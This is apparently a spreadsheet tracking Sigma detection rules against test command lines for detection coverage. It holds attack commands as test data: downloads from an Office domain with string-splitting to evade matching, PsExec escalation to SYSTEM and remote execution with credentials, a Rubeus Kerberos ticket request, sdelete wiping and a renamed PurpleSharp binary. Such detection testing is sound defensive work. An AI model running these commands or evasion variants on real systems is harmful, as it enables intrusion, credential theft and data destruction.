      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E10" s="43" t="inlineStr">
        <is>
          <t xml:space="preserve">curl.exe -sSL "https://attachment.outlook.live.net/owa/test.txt" -o "C:\Temp\test.txt" </t>
        </is>
      </c>
      <c r="F10" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G10" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="43" t="n"/>
      <c r="K10" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="inlineStr">
        <is>
          <t>t1587</t>
        </is>
      </c>
      <c r="B11" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_purplesharp_indicators</t>
        </is>
      </c>
      <c r="C11" s="43" t="inlineStr">
        <is>
          <t>HackTool - PurpleSharp Execution</t>
        </is>
      </c>
      <c r="D11" s="43" t="inlineStr">
        <is>
          <t>ff23ffbc-3378-435e-992f-0624dcf93ab4</t>
        </is>
      </c>
      <c r="E11" s="43" t="inlineStr">
        <is>
          <t>ren PurpleSharp.exe PsSim.exe &amp;&amp; .\PsSim.exe -t T1059.001 -m localhost</t>
        </is>
      </c>
      <c r="F11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K11" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="43" t="inlineStr">
        <is>
          <t>t1587</t>
        </is>
      </c>
      <c r="B12" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_purplesharp_indicators</t>
        </is>
      </c>
      <c r="C12" s="43" t="inlineStr">
        <is>
          <t>HackTool - PurpleSharp Execution</t>
        </is>
      </c>
      <c r="D12" s="43" t="inlineStr">
        <is>
          <t>ff23ffbc-3378-435e-992f-0624dcf93ab4</t>
        </is>
      </c>
      <c r="E12" s="43" t="inlineStr">
        <is>
          <t>Copy-Item PurpleSharp.exe not_a_tool.exe; .\not_a_tool.exe -t T1059.001 -m localhost</t>
        </is>
      </c>
      <c r="F12" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K12" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="44" t="n"/>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_remote_execution</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Potential PsExec Remote Execution</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>ea011323-7045-460b-b2d7-0f7442ea6b38</t>
        </is>
      </c>
      <c r="E13" s="44" t="n"/>
      <c r="F13" s="44" t="n"/>
      <c r="G13" s="44" t="n"/>
      <c r="H13" s="44" t="n"/>
      <c r="I13" s="44" t="n"/>
      <c r="J13" s="44" t="n"/>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="4" t="n"/>
      <c r="B14" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_susp_psexec_paexec_flags</t>
        </is>
      </c>
      <c r="C14" s="4" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation To LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D14" s="4" t="inlineStr">
        <is>
          <t>207b0396-3689-42d9-8399-4222658efc99</t>
        </is>
      </c>
      <c r="E14" s="44" t="n"/>
      <c r="F14" s="44" t="n"/>
      <c r="G14" s="44" t="n"/>
      <c r="H14" s="44" t="n"/>
      <c r="I14" s="44" t="n"/>
      <c r="J14" s="44" t="n"/>
      <c r="K14" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B15" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C15" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D15" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E15" s="44" t="inlineStr">
        <is>
          <t>curl.exe -sSL "[https://attachment.outlook.live.net:443/owa/test.txt](https://attachment.outlook.live.net:443/owa/test.txt)" -o "C:\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F15" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J15" s="44" t="n"/>
      <c r="K15" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B16" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C16" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D16" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E16" s="44" t="inlineStr">
        <is>
          <t>curl.exe -sSL "[https://attachment.outlook.live.net/owa/./test.txt](https://attachment.outlook.live.net/owa/./test.txt)" -o "C:\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F16" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Suspicious Download from Office Domain (00d49ed5-4491-4271-a8db-650a4ef6f8c1)</t>
        </is>
      </c>
      <c r="J16" s="44" t="n"/>
      <c r="K16" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B17" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C17" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D17" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E17" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-WebRequest ('[https://attachment.outlook.live.net](https://attachment.outlook.live.net)' + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F17" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="4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17" s="44" t="n"/>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B18" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C18" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D18" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E18" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "$u='[https://attachment.outlook.live.net](https://attachment.outlook.live.net)'; iwr ($u + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F18" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="4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18" s="44" t="n"/>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B19" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C19" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D19" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E19" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Start-BitsTransfer -Source ('[https://attachment.outlook.live.net](https://attachment.outlook.live.net)' + '/owa/test.txt') -Destination 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F19" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G19" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J19" s="44" t="n"/>
      <c r="K19" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="4" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B20" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C20" s="4" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D20" s="4" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "$d='attachment.outlook.live.net'; Invoke-WebRequest ('https://' + $d + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="44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20" s="44" t="n"/>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="22.5" customHeight="1" s="42">
      <c r="A21" s="4" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B21" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C21" s="4" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D21" s="4" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\ExternalPayloads\PsExec.exe" -accepteula=true \\localhost -w c:\ -c C:\AtomicRedTeam\atomics\..\ExternalPayloads\rubeus.exe asktgt /user:Administrator /password:Password /domain:THAIMX /outfile:ticket.kirbi</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="n"/>
      <c r="J21" s="44" t="n"/>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="22.5" customHeight="1" s="42">
      <c r="A22" s="4" t="inlineStr">
        <is>
          <t>t1588.002</t>
        </is>
      </c>
      <c r="B22" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_eula_accepted</t>
        </is>
      </c>
      <c r="C22" s="4" t="inlineStr">
        <is>
          <t>Potential Execution of Sysinternals Tools</t>
        </is>
      </c>
      <c r="D22" s="4" t="inlineStr">
        <is>
          <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\ExternalPayloads\Sdelete\sdelete.exe" "-accepteula" C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1485.txt</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="44" t="n"/>
      <c r="J22" s="44" t="n"/>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="22.5" customHeight="1" s="42">
      <c r="A23" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B23" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C23" s="4" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D23" s="4" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -i -s "cmd"</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="44" t="n"/>
      <c r="J23" s="44" t="n"/>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="22.5" customHeight="1" s="42">
      <c r="A24" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B24" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C24" s="4" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D24" s="4" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -s -i cmd.exe -accepteula</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="44" t="n"/>
      <c r="J24" s="44" t="n"/>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="22.5" customHeight="1" s="42">
      <c r="A25" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B25" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_paexec_escalate_system</t>
        </is>
      </c>
      <c r="C25" s="4" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D25" s="4" t="inlineStr">
        <is>
          <t>8834e2f7-6b4b-4f09-8906-d2276470ee23</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" -accepteula=true -i -s cmd</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="44" t="n"/>
      <c r="J25" s="44" t="n"/>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="22.5" customHeight="1" s="42">
      <c r="A26" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B26" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_remote_execution</t>
        </is>
      </c>
      <c r="C26" s="4" t="inlineStr">
        <is>
          <t>Potential PsExec Remote Execution</t>
        </is>
      </c>
      <c r="D26" s="4" t="inlineStr">
        <is>
          <t>ea011323-7045-460b-b2d7-0f7442ea6b38</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" \\TEST-HOST /u testuser /p testpassword -accepteula whoami</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="44" t="n"/>
      <c r="J26" s="44" t="n"/>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="22.5" customHeight="1" s="42">
      <c r="A27" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B27" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psexec_remote_execution</t>
        </is>
      </c>
      <c r="C27" s="4" t="inlineStr">
        <is>
          <t>Potential PsExec Remote Execution</t>
        </is>
      </c>
      <c r="D27" s="4" t="inlineStr">
        <is>
          <t>ea011323-7045-460b-b2d7-0f7442ea6b38</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>"C:\Users\Public\Temp\PsExec.exe" \\TEST-HOST "-u" testuser "-p" testpassword -accepteula whoami</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="44" t="n"/>
      <c r="J27" s="44" t="n"/>
      <c r="K27" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="22.5" customHeight="1" s="42">
      <c r="A28" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B28" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_susp_psexec_paexec_flags</t>
        </is>
      </c>
      <c r="C28" s="4" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation To LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D28" s="4" t="inlineStr">
        <is>
          <t>207b0396-3689-42d9-8399-4222658efc99</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\RemoteExecHelper.exe -s "cmd" /c whoami</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J28" s="44" t="n"/>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="22.5" customHeight="1" s="42">
      <c r="A29" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B29" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_susp_psexec_paexec_flags</t>
        </is>
      </c>
      <c r="C29" s="4" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation To LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D29" s="4" t="inlineStr">
        <is>
          <t>207b0396-3689-42d9-8399-4222658efc99</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\RemoteExecHelper.exe -s cmd.exe /c whoami</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation To LOCAL SYSTEM (207b0396-3689-42d9-8399-4222658efc99); Potential Privilege Escalation To LOCAL SYSTEM (207b0396-3689-42d9-8399-4222658efc99); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J29" s="44" t="n"/>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="22.5" customHeight="1" s="42">
      <c r="A30" s="4" t="inlineStr">
        <is>
          <t>t1587.001</t>
        </is>
      </c>
      <c r="B30" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_susp_psexec_paexec_flags</t>
        </is>
      </c>
      <c r="C30" s="4" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation To LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D30" s="4" t="inlineStr">
        <is>
          <t>207b0396-3689-42d9-8399-4222658efc99</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\RemoteExecHelper.exe -accepteula -s cmd /c whoami</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="44" t="inlineStr">
        <is>
          <t>PsExec/PAExec Escalation to LOCAL SYSTEM (8834e2f7-6b4b-4f09-8906-d2276470ee23); PsExec/PAExec Escalation to LOCAL SYSTEM (8834e2f7-6b4b-4f09-8906-d2276470ee23); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Potential Execution of Sysinternals Tools (7cccd811-7ae9-4ebe-9afd-cb5c406b824b); Potential Execution of Sysinternals Tools (7cccd811-7ae9-4ebe-9afd-cb5c406b824b)</t>
        </is>
      </c>
      <c r="J30" s="44" t="n"/>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="22.5" customHeight="1" s="42">
      <c r="A31" s="34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 ht="22.5" customHeight="1" s="42">
      <c r="A32" s="34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 ht="22.5" customHeight="1" s="42">
      <c r="A33" s="34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 ht="22.5" customHeight="1" s="42">
      <c r="A34" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A35" s="34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15.75" customHeight="1" s="42">
      <c r="A36" s="34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</row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="34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</row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="34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</row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="34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</row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="34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</row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A42" s="34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</row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A44" s="34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</row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="34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</row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A47" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A49" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A50" s="34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15.75" customHeight="1" s="42">
      <c r="A51" s="34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</row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="34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</row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="34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</row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="34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</row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="34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</row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A59" s="34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</row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="34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</row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A62" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A63" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A64" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A65" s="34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15.75" customHeight="1" s="42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</row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="34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</row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="34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</row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="34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</row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="34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</row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A72" s="34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</row>
    <row r="73" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A74" s="34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</row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="34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</row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A77" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A78" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A80" s="34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15.75" customHeight="1" s="42">
      <c r="A81" s="34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</row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="34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</row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="34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</row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="34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</row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="34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</row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A87" s="34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</row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A89" s="34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</row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="34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</row>
    <row r="91" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A92" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A93" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A94" s="34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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42">
      <c r="A96" s="34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</row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="34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</row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="34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</row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="34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</row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="34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</row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A102" s="34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</row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="34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 ht="15.75" customHeight="1" s="42">
      <c r="A104" s="34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</row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="34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</row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A108" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A110" s="34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15.75" customHeight="1" s="42">
      <c r="A111" s="34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</row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="34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</row>
    <row r="113" ht="15.75" customHeight="1" s="42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</row>
    <row r="114" ht="15.75" customHeight="1" s="42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</row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="34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</row>
    <row r="116" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="118" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="120" ht="15.75" customHeight="1" s="42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</row>
